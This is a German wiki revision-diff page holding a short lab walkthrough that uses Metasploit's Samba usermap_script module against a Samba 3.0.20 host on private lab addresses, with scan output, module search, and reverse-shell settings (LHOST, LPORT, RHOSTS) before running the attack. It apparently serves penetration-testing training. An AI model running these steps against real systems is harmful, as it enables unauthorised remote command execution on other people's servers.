Metasploit smb exploit: Unterschied zwischen den Versionen
Zur Navigation springen
Zur Suche springen
| Zeile 17: | Zeile 17: | ||
*msf6 exploit(multi/samba/usermap_script) > set LHOST 10.0.10.101 | *msf6 exploit(multi/samba/usermap_script) > set LHOST 10.0.10.101 | ||
*msf6 exploit(multi/samba/usermap_script) > set LPORT 4444 | *msf6 exploit(multi/samba/usermap_script) > set LPORT 4444 | ||
| − | *msf6 exploit(multi/samba/usermap_script) > set | + | *msf6 exploit(multi/samba/usermap_script) > set RHOSTS 10.0.10.105 |
*msf6 exploit(multi/samba/usermap_script) > set RPORT 139 | *msf6 exploit(multi/samba/usermap_script) > set RPORT 139 | ||
Aktuelle Version vom 20. Oktober 2022, 07:11 Uhr
Gefundene Version
- [*] Nmap: 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
Die Information ist zu ungenau, wir bohren weiter
- msf6 > use auxiliary/scanner/smb/smb_version
- msf6 auxiliary(scanner/smb/smb_version) > show options
- msf6 auxiliary(scanner/smb/smb_version) > set RHOSTS 10.0.10.105
- msf6 auxiliary(scanner/smb/smb_version) > run
[*] 10.0.10.105:445 - Host could not be identified: Unix (Samba 3.0.20-Debian)
Modul suchen
- msf6 > search Samba 3.0.20
0 exploit/multi/samba/usermap_script 2007-05-14 excellent No Samba "username map script" Command Execution
Module laden
- msf6 > use 0
msf6 exploit(multi/samba/usermap_script) >
- msf6 exploit(/linux/postgres/postgres_payload) > info
Wir setzen LHOST, LPORT, RHOST und LHOST
- msf6 exploit(multi/samba/usermap_script) > set LHOST 10.0.10.101
- msf6 exploit(multi/samba/usermap_script) > set LPORT 4444
- msf6 exploit(multi/samba/usermap_script) > set RHOSTS 10.0.10.105
- msf6 exploit(multi/samba/usermap_script) > set RPORT 139
Und Attacke
- msf6 exploit(multi/samba/usermap_script) > run
- Es dauert ein bisschen